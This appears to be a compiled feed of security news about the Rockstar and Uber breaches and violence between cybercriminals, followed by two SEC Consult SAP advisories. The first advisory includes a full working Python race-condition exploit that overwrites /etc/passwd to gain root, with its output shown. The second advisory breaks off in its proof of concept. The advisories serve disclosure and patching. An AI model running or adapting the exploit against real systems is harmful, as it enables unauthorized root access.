The Take-Two Interactive subsidiary acknowledges an attack on its systems, where an attacker downloaded "early development footage for the next Grand Theft Auto" and other assets.

Rockstar Games, a subsidiary of Take-Two Interactive Software, today confirmed that an unauthorized third party had downloaded files and videos for its flagship game Grand Theft Auto 6 following the posting over the weekend of scores of video clips to an online forum.

More than 90 video files — since removed — were posted at 3:26 a.m. on Sunday, Sept. 18, to the GTAForums. Several forum users considered the videos to be authentic, and the forum administrators appeared to confirm that that data was stolen when they pulled down the files and posted a warning for forum members to not share media or links to copyrighted material.

By early Monday, Take-Two Interactive had confirmed the breach in a corporate filing with the Securities and Exchange Commission.

"Rockstar Games recently experienced a network intrusion in which an unauthorized third party illegally accessed and downloaded confidential information from its systems, including early development footage for the next Grand Theft Auto," the company stated in the filing. "Current Rockstar Games services are unaffected. We have already taken steps to isolate and contain this incident."

The breach is the latest attack on gaming companies. In June 2021, game giant Electronic Arts suffered a massive breach, with cybercriminals stealing nearly 800GB of source code and data from the firm. The breach followed an attack on CD Projekt Red, the maker of the Witcher games and Cyberpunk 2077, which resulted in the theft of internal data and source code.

Game companies are not the only group being targeted — attackers are also focused on gamers. Players of the top 28 games encountered more than 380,000 instances of malware and unwanted files the 12 months ending in June 2022, according to software security firm Kaspersky Lab. Rockstar Games' Grand Theft Auto was the fourth most targeted PC game, according to the firm's analysis.

"Despite the fact that the number of users affected by gaming-related threats has dropped, certain gaming threats are still on the rise," Kaspersky researchers stated. "Over the past year, we have seen an increase in cybercriminal activity around stealers, which allow attackers to steal bank card data, credentials, and even crypto wallets data from infected devices."

**Uber-Hacker Poser**

In the Rockstar Games attack, the threat actor apparently gained access through a compromised credential. The cybercriminal used the name "teapotuberhacker," reportedly claiming to be the person behind the breach of Uber last week.

However, reliable details of the hack are in short supply. Already, fraudsters have posted a great deal of misinformation on Twitter and have reserved names similar to the hacker's on Telegram and other social media networks.

A thread on the GTAForums appears to be genuine, however. The administrators have already removed the video files and links posted by the purported hacker. Multiple posts on the GTAForums have claimed that the videos came from a developer Slack channel, which is similar to the compromise of Electronic Arts. The posted videos are dated between March 2021 and September 2022.

Take-Two Interactive and Rockstar Games played down the impact of the attack, maintaining that the development of the game will not be affected.

"Work on the game will continue as planned," the company stated in its SEC filing. "At this time, Rockstar Games does not anticipate any disruption to its current services nor any long-term effect on its development timelines as a result of this incident."

The hacker posted the videos to GTAForums early Sunday morning, stating, "Here are 90 footage/clips from GTA 6," and adding, "Its possible i could leak more data soon, GTA 5 and 6 source code and assets, GTA 6 testing build."

The attacker may not have had general access to Rockstar Games' systems, but only the communication channels used by developers. "These videos were downloaded from Slack," the poster wrote, clarifying that the source was "employee communications."

**Wall Street Fallout**

The breach initially hurt Take-Two Interactive's stock price (NASDAQ: TTWO), but the company's assurance that the game's launch date would not be delayed seemed to assuage investors, and the stock rose slightly by late afternoon. The company has actually not yet announced the game's official release data, but reports have pegged mid- to late-2024 as likely.

"We are extremely disappointed to have any details of our next game shared with you all in this way," the company said in a statement posted on Twitter. "Our work on the next Grand Theft Auto game will continue as planned and we remain as committed as ever to delivering an experience to you, our players, that truly exceeds your expectations."

Rockstar Games Confirms 'Grand Theft Auto 6' Breach

By Waqas
Rockstar Games has acknowledged the breach stating that the company is "extremely disappointed" to have any details of their next game shared with the public in such a way.
This is a post from HackRead.com Read the original post: Uber Hacker Targets Rockstar Games, Leaks Trove of GTA 6 Data

In an unexpected twist, the hacker who claimed to have hacked Uber Inc. has targeted Rockstar Game. Resultantly, Grand Theft Auto 6 (GTA 6) gameplay videos and source code have been leaked online.

Uber hacker on GTA forums announcing GTA 6 hack and leaking its data (Image: Waqas – Hackread.com)

**Incident Details**

As seen by Hackread.com, a hacker going by the online handle of “teapotuberhacker” on GTA Forums uploaded a ZIP file listing videos and screenshots of what he termed the alleged first and unreleased footage of GTA 6.

GTA images and videos plus internal software (Image: Waqas – Hackread.com)

The hacker also claimed that he was behind Uber’s cyberattack and posted screenshots of GTA V and GTA 6 source code as proof. It is worth noting that the GTA 6 will be released sometime in 2025.

The hacker further claimed that he has stolen GTA 5 and 6 source code, assets, and GTA 6 testing build and is now trying to extort Rockstar Games instead of leaking more data. The massive GTA 6 leak was also possible through Slack. That’s the same way the hacker targeted Uber.

**Leaked Content Analysis**

The leaked GTA 6 footage shows a female protagonist. The image could be authentic if the rumor spread by Bloomberg’s Jason Schreier in July is to be believed. The source code and videos were first leaked on GTAForums, and the RAR archive contains around ninety (90) stolen videos.

These videos are created by developers while debugging the game’s different features, including NPC tracking, camera angles, and Vice City locations. Some videos also contain voice communication between various NPCs and the protagonist.

Other clips showcase female and male main characters and gameplay taking place in the fictional city.

The female protagonist in GTA 6 everyone talking about

**Company’s Response**

Rockstar Games has acknowledged the security breach. On Twitter, the gaming giant released a statement sharing its disappointment. However, the company vowed to continue to work on the next GTA 6 as planned.

According to Schreier, he also confirmed from Rockstar that this leak was indeed authentic and the footage is real. On the other hand, the hacker has revealed that Rockstar Games is willing to pay $10,000 for the GTA V source code/assets, whereas the GTA 6 source code is currently not up for sale.

Rockstar Games on Twitter

Since the leaked content has made it to Twitter and YouTube, Rockstar Games’ owner Take 2 Interactive has issued DMCA infringement notices and requested to take the videos offline, which has been facilitated.

But it is too little and too late because the hacker has already started leaking the GTA 6 stolen videos and source code portions on Telegram. Today, the threat actor posted a GTA 6 source file containing 9,500 lines, which seems related to the execution of scripts for in-game actions.

1.  Minecraft declared the most malware-infected game
2.  Fake gaming apps on Microsoft Store drop Electron Bot malware
3.  Russian Hacker Exploits GTA 5 PC Mod to Install Cryptocurrency Miner
4.  Grand Theft Auto (GTA) Fan Forum Hacked; Thousands of Accounts Stolen
5.  Authorities search & seize properties of GTA V’s “Infamous” cheat developers

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Uber Hacker Targets Rockstar Games, Leaks Trove of GTA 6 Data

An alleged teen hacker claims to have gained deep access to the company’s systems, but the full picture of the breach is still coming into focus.

On Thursday evening, ride-share giant Uber confirmed that it was responding to “a cybersecurity incident” and was contacting law enforcement about the breach. An entity that claims to be an individual 18-year-old hacker took responsibility for the attack, bragging to multiple security researchers about the steps they took to breach the company. The attacker reportedly posted, “Hi @here I announce I am a hacker and Uber has suffered a data breach,” in a channel on Uber's Slack on Thursday night. The Slack post also listed a number of Uber databases and cloud services that the hacker claimed to have breached. The message reportedly concluded with the sign-off, “uberunderpaisdrives.”

The company temporarily took down access on Thursday evening to Slack and some other internal services, according to _The New York Times_, which first reported the breach. In a midday update on Friday, the company said that “internal software tools that we took down as a precaution yesterday are coming back online.” Invoking time-honored breach-notification language, Uber also said on Friday that it has “no evidence that the incident involved access to sensitive user data (like trip history).” Screenshots leaked by the attacker, though, indicate that Uber's systems may have been deeply and thoroughly compromised and that anything the attacker didn't access may have been the result of limited time rather than limited opportunity.

“It’s disheartening, and Uber is definitely not the only company that this approach would work against,” says offensive security engineer Cedric Owens of the phishing and social engineering tactics the hacker claimed to use to breach the company. “The techniques mentioned in this hack so far are pretty similar to what a lot of red teamers, myself included, have used in the past. So, unfortunately, these types of breaches no longer surprise me.”

The attacker, who could not be reached by WIRED for comment, claims that they first gained access to company systems by targeting an individual employee and repeatedly sending them multifactor authentication login notifications. After more than an hour, the attacker claims, they contacted the same target on WhatsApp pretending to be an Uber IT person and saying that the MFA notifications would stop once the target approved the login. 

Such attacks, sometimes known as “MFA fatigue” or “exhaustion” attacks, take advantage of authentication systems in which account owners simply have to approve a login through a push notification on their device rather than through other means, such as providing a randomly generated code. MFA-prompt phishes have become more and more popular with attackers. And in general, hackers have increasingly developed phishing attacks to work around two-factor authentication as more companies deploy it. The recent Twilio breach, for example, illustrated how dire the consequences can be when a company that provides multifactor authentication services is itself compromised. Organizations that require physical authentication keys for logins have had success defending themselves against such remote social engineering attacks.

 The phrase "zero trust" has become a sometimes meaningless buzzword in the security industry, but the Uber breach seems to at least show an example of what zero trust is not. Once the attacker had initial access inside the company, they claim they were able to access resources shared on the network that included scripts for Microsoft's automation and management program PowerShell. The attackers said that one of the scripts contained hard-coded credentials for an administrator account of the access management system Thycotic. With control of this account, the attacker claimed, they were able to gain access tokens for Uber's cloud infrastructure, including Amazon Web Services, Google's GSuite, VMware's vSphere dashboard, the authentication manager Duo, and the critical identity and access management service OneLogin.

Screenshots leaked by the attacker support the claims of this deep access, including to OneLogin. In an analysis on Friday, researchers from the cybersecurity firm Group IB suggested that the attacker may have first breached Uber earlier this week and only made their presence known on Thursday.

One independent security engineer described the OneLogin account access the Uber hacker seems to have had access to as “the golden ticket jackpot.”

“That’s God—they own that there’s nothing they can’t access," the security engineer added. "It’s Disneyland. It’s a blank check at the candy shop and Christmas morning all rolled up together. But sure, customer ride data wasn’t impacted. OK.” 

The situation at Uber comes on the heels of congressional testimony on Wednesday from Twitter’s former security chief Peiter “Mudge” Zatko, who has invoked whistleblower protections as part of accusations alleging deplorable security practices within the social media giant. Zatko's testimony this week got senators fired up about the importance of security within Big Tech. But in the past, even the direst and rattling hacks have led only to incremental progress on the most basic best practices. Zatko's testimony did not seem to impact Twitter's stock price at all on Wednesday. Uber's stock had a small dip Friday morning, but it had partly recovered by the closing bell.

For now, the full scope of the situation inside the ride-sharing giant remains unknown.

"I think there are a lot of opportunities to work on detections and preventions proactively," offensive security engineer Owens says. “This can be difficult to execute in practice, though, when you have lots of other fires to put out, political challenges inside of an organization, et cetera. Maybe I’m slowly becoming jaded since I’ve been around in this space for a while.”

The Uber Hack’s Devastation Is Just Starting to Reveal Itself

Three men in the United Kingdom were arrested this month after police responding to an attempted break-in at a residence stopped their car as they fled the scene. The authorities found weapons and a police uniform in the trunk, and say the trio intended to assault a local man and force him to hand over virtual currencies.

Three men in the United Kingdom were arrested this month for attempting to assault a local man and steal his virtual currencies. The incident is the latest example of how certain cybercriminal communities are increasingly turning to physical violence to settle scores and disputes.

Shortly after 11 p.m. on September 6, a resident in the Spalding Common area in the district of Lincolnshire, U.K. phoned police to say three men were acting suspiciously, and had jumped a nearby fence.

“The three men made off in a VW Golf and were shortly stopped nearby,” reads a statement by the **Lincolnshire Police**. “The car was searched by officers who found an imitation firearm, taser, a baseball bat and police uniform in the boot.”

**Thomas Green**, 23, **Rayhan Miah**, 23, and **Leonardo Sapiano**, 24 were all charged with possession of the weapons, and “_with intent to cause loss to another to make an unwarranted demand of Crypto Currency from a person_.”

KrebsOnSecurity has learned that the defendants were in Spalding Common to pay a surprise visit to a 19-year-old hacker known by the handles “Discoli,” “Disco Dog,” and “Chinese.” In December 2020, Discoli took credit for hacking and leaking the user database for OGUsers, a forum overrun with people looking to buy, sell and trade access to compromised social media accounts.

Reached via Telegram, Discoli confirmed that police believe the trio was trying to force their way into his home in Spalding Common, and that one of them was wearing a police uniform when they approached his residence.

“They were obvious about being fake police, so much so that one of our neighbours called,” Discoli said in an instant message chat. “That call led to the arrests. Their intent was for robbery/blackmail of crypto, I just happened to not be home at the time.”

The Lincolnshire Police declined to comment for this story, citing an ongoing investigation.

Discoli said he didn’t know any of the men charged, but believes they were hired by one of his enemies. And he said his would-be assailants didn’t just target him specifically.

“They had a list of people they wanted to hit consecutively as far as I know,” he said.

The foiled robbery is the latest drama tied to members of certain criminal hacking communities who are targeting one another with physical violence, by making a standing offer to pay thousands of dollars to anyone in the target’s region who agrees to carry out the assaults.

Last month, a 21-year-old New Jersey man was arrested and charged with stalking in connection with a federal investigation into groups of cybercriminals who are settling scores by hiring people to carry out physical attacks on their rivals.

Prosecutors say **Patrick McGovern-Allen** recently participated in several of these schemes — including firing a handgun into a Pennsylvania home and torching a residence in another part of the state with a Molotov Cocktail.

McGovern-Allen and the three U.K. defendants are part of an online community that is at the forefront of a dangerous escalation in coercion and intimidation tactics increasingly used by competing cybercriminal groups to steal cryptocurrency from one another and to keep their rivals in check.

The Telegram chat channels where these young men transact have hundreds to thousands of members each, and some of the more interesting solicitations on these communities are job offers for in-person assignments and tasks that can be found if one searches for posts titled, “If you live near,” or “IRL job” — short for “in real life” job.

A number of these classified ads are in service of performing “brickings,” where someone is hired to visit a specific address and toss a brick through the target’s window. Indeed, prior to McGovern-Allen’s arrest, his alleged Telegram persona bragged that he’d carried out several brickings for hire.

Many of the individuals involved in paying others to commit these physical attacks are also frequent participants in Telegram chat channels focused singularly on SIM swapping, a crime in which identity thieves hijack a target’s mobile phone number and use that to wrest control over the victim’s various online accounts and identities.

Unsurprisingly, the vast majority of people currently being targeted for brickings and other real-life physical assaults via Telegram tend to be other cybercriminals involved in SIM swapping crimes (or individuals on the periphery of that scene).

The United Kingdom is home to a number of young men accused of stealing millions of dollars worth of cryptocurrencies via SIM swapping. **Joseph James O’Connor**, a.k.a. “Plugwalk Joe”, was arrested in Spain in July 2021 under an FBI warrant on 10 counts of offenses related to unauthorized computer access and cyber bullying. U.S. investigators say O’Connor also played a central role in the 2020 intrusion at Twitter, wherein Twitter accounts for top celebrities and public figures were forced to tweet out links to cryptocurrency scams. O’Connor is currently fighting extradition to the United States.

**Robert Lewis Barr**, a 25-year-old Scottish man who allegedly stole more than $8 million worth of crypto, was arrested on an FBI warrant last year and is also fighting his extradition. U.S. investigators say Barr SIM swapped a U.S. bitcoin broker in 2017, and that he spent much of the stolen funds throwing lavish parties at rented luxury apartments in central Glasgow.

In many ways, these violence-as-a-service incidents are a natural extension of “swatting,” wherein fake bomb threats, hostage situations and other violent scenarios are phoned in to police as part of a scheme to trick them into visiting potentially deadly force on a target’s address. According to prosecutors, both Barr and O’Connor have a history of swatting their enemies and their SIM swapping victims.

Botched Crypto Mugging Lands Three U.K. Men in Jail

A teen hacker reportedly social-engineered an Uber employee to hand over an MFA code to unlock the corporate VPN, before burrowing deep into Uber's cloud and code repositories.

**_This post was updated at 2:15 ET on Sept. 16, 2022 to reflect additional initial compromise information._**

Ride-sharing giant Uber took some of its operations offline late Thursday after it discovered that its internal systems have been compromised. The attacker was able to social-engineer his way into an employee's VPN account before pivoting deeper into the network, the company said.

While the full extent of the breach has yet to come to light, the person claiming responsibility for the attack (reportedly a teenager) claimed to have troves of emails, data pilfered from Google Cloud storage, and Uber's proprietary source code, "proof" of which he sent out to some cybersecurity researchers and media outlets, including The New York Times.

"They pretty much have full access to Uber," Sam Curry, security engineer at Yuga Labs, told the Times. "This is a total compromise, from what it looks like."

**Compromise Dominoes**

The Slack collaboration platform was the first system taken offline, but other internal systems quickly followed, according to reports. Just before the disablement, the attacker sent off a Slack message to Uber employees (some of whom shared it on Twitter): "I announce I am a hacker and Uber has suffered a data breach."

The perp also told researchers and media that the breach began with a text message to an Uber employee, purporting to be from corporate IT. More specifically, according to independent cybersecurity analyst Graham Cluley, the hacker mounted what's known as an "MFA fatigue attack." 

To wit: The attacker had already determined a valid username and password for Uber's VPN, but needed a text-based multifactor authentication (MFA) one-time code to get into the account. So, he bombarded the worker with MFA push notifications for more than an hour before contacting the target via WhatsApp, where he again posed as Uber IT staff. If the person wanted the irritation to stop, he said, they needed to accept the MFA request. The target complied.

"While no official explanation has been provided yet, \[apparently\] the intruder was able to connect to the corporate VPN to gain access to the wider Uber network, and then seems to have stumbled on gold in the form of admin credentials stored in plain text on a network share," Ian McShane, vice president of strategy at Arctic Wolf, said in a statement. "This is a pretty low-bar-to-entry attack and is something akin to the consumer-focused attackers calling people claiming to be Microsoft and having the end user install keyloggers or remote access tools."

The hacker also told other researchers that once in, he scanned the company’s intranet, and was lucky enough to find a PowerShell script containing hardcoded credentials for a Thycotic privileged access management (PAM) admin account, which gave him bountiful tools to unlock other internal systems, like Slack.

In a media statement to the Times, an Uber spokesperson confirmed that social engineering was the point of entry, and simply said that the company was working with law enforcement to investigate the breach. Publicly, via Twitter, the company posted, "We are currently responding to a cybersecurity incident. We are in touch with law enforcement and will post additional updates here as they become available."

According to reports, the hacker said he is 18 years old and targeted the company to demonstrate its weak security; there may also be a hacktivist element, because he also declared in the Slack message to employees that Uber drivers should be paid more.

"Given the access they claim to have gained, I'm surprised the attacker didn't attempt to ransom or extort, it looks like they did it 'for the lulz,'" McShane added.

**Not Uber's First Data Breach Ride**

Uber was the subject of another massive breach, back in 2016. In that incident, cyberattackers made off with personal information for 57 million customers and drivers, demanding $100,000 in exchange for not weaponizing the data (the company paid up). A subsequent criminal investigation led to a non-prosecution settlement with the US Department of Justice this summer, which included Uber admitting that it actively covered up the full extent of the breach, which it didn't even disclose for more than a year.

Also related to that earlier hit, in 2018 Uber settled nationwide civil litigation by paying $148 million to all 50 states and the District of Columbia; and, ironically given the new developments, it agreed to "implement a corporate integrity program, specific data security safeguards, and incident response and data breach notification plans, along with biennial assessments."

Hacker Pwns Uber Via Compromised VPN Account

SAPControl Web Service Interface (sapstartsrv) suffers from a privilege escalation vulnerability via a race condition.

SEC Consult Vulnerability Lab Security Advisory < 20220915-0 >  
=======================================================================  
               title: Local privilege escalation  
             product: SAP® SAPControl Web Service Interface (sapuxuserchk)  
  vulnerable version: see section "Vulnerable /  tested versions"  
       fixed version: see SAP security note 3158619  
          CVE number: CVE-2022-29614  
              impact: medium  
            homepage: https://www.sap.com/about.html  
               found: 2022-02-24  
                  by: M. Li (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"The SAP Start Service (sapstartsrv) provides basic management services for  
systems and instances and single server processes. Services include starting  
and stopping, monitoring the current run-time state, reading logs, traces and  
configuration files, executing commands and retrieving other  
technology-specific information, like network access points, active sessions,  
thread list etc. They are exposed by a SOAP Web service interface named  
"SAPControl". This paper describes how to use this Web service interface."

Source: https://assets.cdn.sap.com/sapcom/docs/2016/09/0a40e60d-8b7c-0010-82c7-eda71af511fa.pdf

Business recommendation:  
------------------------  
SEC Consult recommends to implement the security note 3158619, where the  
documented issue is fixed according to the vendor. We advise installing the  
corrections as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:  
-----------------------------------  
1) Local privilege escalation (CVE-2022-29614)  
The SUID-root program sapuxuserchk erroneously follows the symbolic link to  
create a temporary local logon ticket and change the ownership of the target  
file for owner access only. As member of the group sapsys, a user can therefore  
escalate his/her privileges to root on a local Unix system by successfully  
exploiting a race condition.

Proof of concept:  
-----------------  
1) Local privilege escalation (CVE-2022-29614)  
The utility sapuxuserchk is used by sapcontrol to request a temporary local  
logon ticket in the following way. As a result, the ticket is created in the  
folder /usr/sap/SEC/D00/work/sapcontrol_logon/

$ sapcontrol -nr 0 -function RequestLogonFile user0

$ ls -l logon*  
-rw------- 1 secadm sapsys 40 Feb 25 08:58 logon0  
-rw------- 1 user0  users  40 Feb 25 09:00 logon1  
-rw------- 1 root   root   40 Feb 25 09:01 logon2

Since sapcontrol is supposed to create the ticket for any system user, it  
requires a utility with SUID bit set. The owner, group and its permission bits  
of sapuxuserchk of a standard installation are shown below.

$ ls -l sapuxuserchk  
-rwsr-x--- 1 root sapsys 1312137 Feb 28  2019 sapuxuserchk

The request originating from sapcontrol is first sent to the instance server  
sapstartsrv, piping into sapuxuserchk a 512-byte encrypted message, which  
contains the ticket path, user name and ticket in the plaintext, as an example  
shown below.

$ strings input-0-plaintext  
SAPLOGONFILE /usr/sap/SEC/D00/work/sapcontrol_logon/logon1  
  user0  
1133146902252676394602837452470900726967

On its duty to create the ticket, sapuxuserchk performs the sanity check to  
guarantee the non-existence of the file prior to the creation in the  
function internal_create_saplogon_file.

However, it introduces a race condition between the stat and open calls, as  
shown by the following excerpt from strace.

stat("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", 0x7ffc0d2e1530) = -1 ENOENT (No such file or directory)  
open("/usr/sap/SEC/D00/work/sapcontrol_logon/logon1", O_RDWR|O_CREAT|O_TRUNC, 0600) = 3  
  fchown(3, 1000, 100)

The attacker can run a race of constantly creating a symbolic link logon1  
pointing to a privileged file such as /etc/passwd and meanwhile invoke the  
SUID-root program sapuxuserchk, in the hope that the creation of the link  
take place between the stat and open calls, so that the first will fail,  
(meaning that the file does not exist yet) while the second as well as the  
ensuing fchown call succeeds. In a positive result, the attacker gains the  
read-write permission of the target file.

The following run to winning the race took 629 attempts to finally gain the  
root privilege. The PoC further below lists the exploit implementing the idea  
above with a pre-intercepted message for user secadm.

-------------------------------------------------------------------------  
sh-4.3$ id  
uid=1001(secadm) gid=474(sapsys) groups=474(sapsys),1000(sapinst)

sh-4.3$ ls -l /etc/passwd  
-rw-r--r-- 1 root root 2517 Feb 25 00:47 /etc/passwd

sh-4.3$ python3 sapmatt.py  
this many tries: 629  
[+] now login as sapmatt

sh-4.3$ su sapmatt  
Password:

sh-4.3# id  
uid=0(sapmatt) gid=0(root) groups=0(root)

sh-4.3# ls -l /etc/passwd  
-rw-r--r-- 1 secadm sapsys 73 Feb 25 10:03 /etc/passwd

$ cat sapmatt.py  
import sys, os, signal, base64, random, string

secadm_msg =   
b'O9OXlWwex4ddSI5vhXFfUQvZ8Td3NWzRNIb9QN6bHY764Z0zVNuVjFHRGhHEgYgwNQDnf0/bBwzlEXCSXFkhtiDqDohuyCxG4mtRqc86FlB6DTOjBY9o/6Cb3rRSZ58jggx71JXMRk21jW3gqdem+tmqHCnIumZjodk2cuk5/MY76dsD65s3j1XrQS0RT3gPaspl/6Yb842hbVTZXVRY3cHKzNq5tZMKB2LmyyslO4xCI00eBN6k6yEKNFLvMx8lYbAIaHcfdWu3pMWVIb9rT3BoTCHwi5hBz8dHk6usdEw05q/Xuxe28gxWCUZpN09sYsd/5R8HqqLfwyiNI7CTBCA3f+fHUweJPuteD5O8bwo/mEOShHimO1gPZzhBdow2C0JszYQeQpxgRtENXPUt2qgT7TJqmItxM0puB8ry0TnKJIbk5gj0smflBPBZyTDXl+qNUmgWL1dK/SBpTUErGMVXFVBi8bNDMSUhcJa+0IQlYSBHPln17kquqhGvlRYYZVJttDNoYcvBchc4HxHZmH5pHkD4fhbcQgFT0UFgceSH1j3sE6G/M/QM1X/vTVE4534XJ3mDcFk/brOYun1dawJ30BkJ9HbP5weihwRwspOq52qRZ9CXsnJCtFPNqNWNIe8BgQUW8WV7FkiDJ+Lpp0pq8KLlZ0Yomz46YfCHkag='  
# openssl passwd sappass  
u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/sh\nsecadm:x:1001:474::/tmp:/bin/sh\n"  
logon_symlink = "/usr/sap/SEC/D00/work/sapcontrol_logon/logon1"  
target_file = "/etc/passwd"

g = 1024  
if not os.path.isfile(logon_symlink):  
         os.system("touch " + logon_symlink)  
secadm_msg = base64.b64decode(secadm_msg)

msg_file = '/tmp/msg' + ''.join(random.choice(string.ascii_letters) for i in range(8))  
f0 = open(msg_file, "wb")  
f0.write(secadm_msg)  
f0.close()

pid = os.fork()  
if pid == 0:  
         j = 0  
         while True:  
                 if j > g:  
                         print('done')  
                         os._exit(os.EX_OK)  
                 j += 1  
                 os.system("/usr/sap/SEC/D00/exe/sapuxuserchk < {0} > /dev/null".format(msg_file))  
else:  
         i = 0  
         uid = os.getuid()  
         success = False  
         while not success:  
                 if i > g:  
                         print("[-] give up, link too many tries: " + str(i))  
                         break  
                 i += 1  
                 try:  
                         os.unlink(logon_symlink)  
                         os.symlink(target_file, logon_symlink)  
                         statinfo = os.stat(target_file)  
                         if statinfo.st_uid == uid:  
                                 os.kill(pid, signal.SIGILL)  
                                 print("this many tries: " + str(i))  
                                 print("[+] now login as sapmatt ")  
                                 f = open(target_file, "w")  
                                 f.write(u1_passwd)  
                                 f.close()  
                                 success = True  
                 except Exception as err:  
                         print('[-] lost the race {0}'.format(err))  
         os.waitpid(pid, 0)  
         os.unlink(msg_file)

-------------------------------------------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following version of the binary was found to be vulnerable during our tests:  
* Version: 753, patch 400, changelist 1906766

According to the vendor the following products are affected by the discovered  
vulnerability:

SAP NetWeaver AS ABAP, AS Java, ABAP Platform and HANA Database, Versions:  
* KERNEL 7.22, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, 7.88  
* KRNL64NUC 7.22, 7.22EXT, 7.49  
* KRNL64UC 7.22, 7.22EXT, 7.49, 7.53  
* SAPHOSTAGENT 7.2

Please refer to the vendor patch day post:  
https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10

Vendor contact timeline:  
------------------------  
2022-02-25: Contacting vendor through vulnerability submission web form.  
2022-03-04: Vendor confirms receipt and assigns SAP security incident number  
             #2270008914.  
2022-04-29: Requesting status update.  
2022-05-05: Vendor confirms vulnerability and states it might be addressed  
             in May 2022 patch day.  
2022-06-14: Vendor releases patches with SAP security note 3158619.  
2022-06-15: Requesting the confirmation of the security note on the issue.  
2022-08-11: Vendor sends the link to the Acknowledgements to Security  
             Researchers.  
2022-09-02: Requesting the confirmation of the fix.  
2022-09-03: Vendor confirms the issue has been fixed on June Patch Day.  
2022-09-15: Public release of security advisory.

Solution:  
---------  
The following security note needs to be implemented:  
https://launchpad.support.sap.com/#/notes/3158619

Workaround:  
-----------  
You can remove the SUID-bit from sapuxuserchk as temporary mitigation.

# chmod 0755 sapuxuserchk

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF M. Li / @2022

SAP SAPControl Web Service Interface Local Privilege Escalation

SAP SAProuter suffers from an improper access control vulnerability where permitting loopback traffic can lead to unexpected behavior.

SEC Consult Vulnerability Lab Security Advisory < 20220914-0 >  
=======================================================================  
               title: Improper Access Control  
             product: SAP® SAProuter  
  vulnerable version: see section "Vulnerable / tested versions"  
       fixed version: see SAP security note 3158375  
          CVE number: CVE-2022-27668  
              impact: high  
            homepage: https://support.sap.com/en/tools/connectivity-tools/saprouter.html  
               found: 2022-02-25  
                  by: Fabian Hagg (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"SAProuter is a software application that provides a remote connection  
between our customer's network and SAP. SAProuter can be used to:

- Improve network security, e.g.by using a password or by only allowing  
   encrypted connections from known sources  
- Control and log the connections to your SAP system  
- Set up an indirect connection when programs involved cannot  
   communicate with each other due to the network configuration  
- Increase performance and stability by reducing the SAP system workload  
   within a local area network (LAN) when communicating with a wide area  
   network (WAN)" [1]

[1] https://support.sap.com/en/tools/connectivity-tools/saprouter.html

Business recommendation:  
------------------------  
SEC Consult recommends to implement the security note 3158375, where the  
documented issue is fixed according to the vendor. We advise installing the  
correction as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:  
-----------------------------------  
1) Improper Access Control (CVE-2022-27668)  
According to SAP note 1853140: "in the default configuration, the  
SAProuter does not allow a route to itself. You can explicitly permit  
the 'loopback' from the SAProuter to itself using option -X".

It has been identified that under certain circumstances, this is not  
valid and may lead to unexpected behavior. External attackers having  
network-wise access to a (weakly configured) SAProuter instance can  
exploit an improper access control vulnerability by sending packets  
of type NI_ROUTE in order to establish a tunnel that allows to manage  
the SAProuter externally even when it was started without option -X.

This enables an attacker to send packets of type ROUTER_ADM in order to  
gain unauthorized access to administrative functions such as stopping  
the remote SAProuter instance, displaying connection information,  
switching trace level, or terminating a specific connection.

Proof of concept:  
-----------------  
1) Improper Access Control (CVE-2022-27668)  
For successful exploitation of this vulnerability, the following prerequisites  
must be met:

- Route permission table saprouttab must contain an entry that  
   explicitly permits external hosts to connect to port 3299 of  
   arbitrary hosts. Some examples of such entries are shown in  
   the following listing:

   P  <source-host incl. attacker-controlled machine>  *  3299  
   P  <source-host incl. attacker-controlled machine>  *  3200.3300

- SAProuter is running (option -X does not need to be set) and the  
   attacker has network-wise access to its listening port.

The vulnerability can be verified by means of the publicly available  
Python script router_portfw.py [2] of the open source pysap framework  
developed by M. Gallo. The script, which is based on a scapy re-implementation  
of the proprietary SAP Router protocol, allows for port forwarding through  
a SAProuter service.

For demonstration purposes, the following simplified lab setup is used:

-------------------------------------------------------------------------  
SAProuter (IPv4:192.168.56.103) <-----> Attacker (IPv4:192.168.56.104)  
-------------------------------------------------------------------------  
SAProuter started with option -r:  |    Pysap framework  
./saprouter -r                     |  
                                    |  
Content of saprouttab in workdir:  |  
P  192.168.56.104  *  3299         |  
-------------------------------------------------------------------------

The following listing shows that it is not possible to establish a  
"loopback" tunnel through the remote SAProuter service by specifying a  
target destination host 127.0.0.1 (option -t) and target destination  
port 3299 (option -r). As expected, this route is filtered and denied  
by default even when explicitly allowed through the route permission  
table.

--------------------------------------------------------------------------  
attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299  
